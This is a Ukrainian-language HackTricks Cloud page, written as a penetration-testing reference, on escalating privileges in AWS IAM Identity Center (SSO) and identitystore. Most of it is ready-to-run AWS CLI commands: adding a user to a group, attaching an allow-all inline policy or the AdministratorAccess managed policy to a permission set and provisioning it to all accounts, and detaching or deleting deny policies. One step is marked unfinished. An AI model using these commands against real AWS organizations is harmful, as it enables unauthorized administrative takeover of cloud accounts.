AWS - SSO & identitystore Privesc

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Якщо ви хочете побачити вашу компанію рекламовану на HackTricks або завантажити HackTricks у форматі PDF, перевірте ПЛАНИ ПІДПИСКИ!
Отримайте офіційний PEASS & HackTricks мерч
Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами на Twitter 🐦 @hacktricks_live.
Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks та HackTricks Cloud репозиторіїв.

Центр ідентичності AWS / AWS SSO

Для отримання додаткової інформації про Центр ідентичності AWS / AWS SSO перегляньте:

Зверніть увагу, що за замовчуванням лише користувачі з дозволами від Облікового запису управління зможуть отримати доступ та керувати центром ідентичності IAM. Користувачі з інших облікових записів можуть це зробити лише у випадку, якщо обліковий запис є Делегованим адміністратором. Перевірте документацію для отримання додаткової інформації.

Скидання пароля

Простий спосіб підвищення привілеїв у таких випадках - мати дозвіл на скидання паролів користувачів. На жаль, можливо лише надіслати електронного листа користувачеві для скидання його пароля, тому вам знадобиться доступ до електронної пошти користувача.

`identitystore:CreateGroupMembership`

З цим дозволом можна додати користувача до групи, щоб він успадковував всі дозволи групи.

aws identitystore create-group-membership --identity-store-id <tore-id> --group-id <group-id> --member-id UserId=<user-id>

`sso:PutInlinePolicyToPermissionSet`, `sso:ProvisionPermissionSet`

Зловмисник з цим дозволом може надати додаткові дозволи для набору дозволів, який надається користувачеві під його контролем

# Set an inline policy with admin privileges
aws sso-admin put-inline-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --inline-policy file:///tmp/policy.yaml

# Content of /tmp/policy.yaml
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Statement1",
"Effect": "Allow",
"Action": ["*"],
"Resource": ["*"]
}
]
}

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

`sso:AttachManagedPolicyToPermissionSet`, `sso:ProvisionPermissionSet`

Зловмисник з цим дозволом може надати додаткові дозволи для Permission Set, який надається користувачеві під його контролем

# Set AdministratorAccess policy to the permission set
aws sso-admin attach-managed-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess"

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

`sso:AttachCustomerManagedPolicyReferenceToPermissionSet`, `sso:ProvisionPermissionSet`

Зловмисник з цим дозволом може надати додаткові дозволи для набору дозволів, який наданий користувачеві під його контролем.

Для зловживання цими дозволами у цьому випадку вам потрібно знати назву керованої клієнтом політики, яка знаходиться у ВСІХ облікових записах, які будуть затронуті.

# Set AdministratorAccess policy to the permission set
aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --customer-managed-policy-reference <customer-managed-policy-name>

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

Проте вам потрібен токен доступу, який я не впевнений, як отримати (TODO).

`sso:DetachManagedPolicyFromPermissionSet`

Атакуючий з цим дозволом може видалити асоціацію між керованою політикою AWS від вказаного набору дозволів. Є можливість надати більше привілеїв шляхом від'єднання керованої політики (відмовна політика).

aws sso-admin detach-managed-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --managed-policy-arn <ManagedPolicyARN>

aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn <value> --permission-set-arn <value> --customer-managed-policy-reference <value>

`sso:DeleteInlinePolicyFromPermissionSet`

Зловмисник з цим дозволом може видалити дозволи з вбудованої політики з набору дозволів. Є можливість надати більше привілеїв, відкріпивши вбудовану політику (політику відмови).

aws sso-admin delete-inline-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Якщо ви хочете побачити свою компанію рекламовану на HackTricks або завантажити HackTricks у форматі PDF, перевірте ПЛАНИ ПІДПИСКИ!
Отримайте офіційний PEASS & HackTricks мерч
Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами на Twitter 🐦 @hacktricks_live.
Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks та HackTricks Cloud репозиторіїв GitHub.

PreviousAWS - SQS Privesc NextAWS - Organizations Privesc

Last updated 1 month ago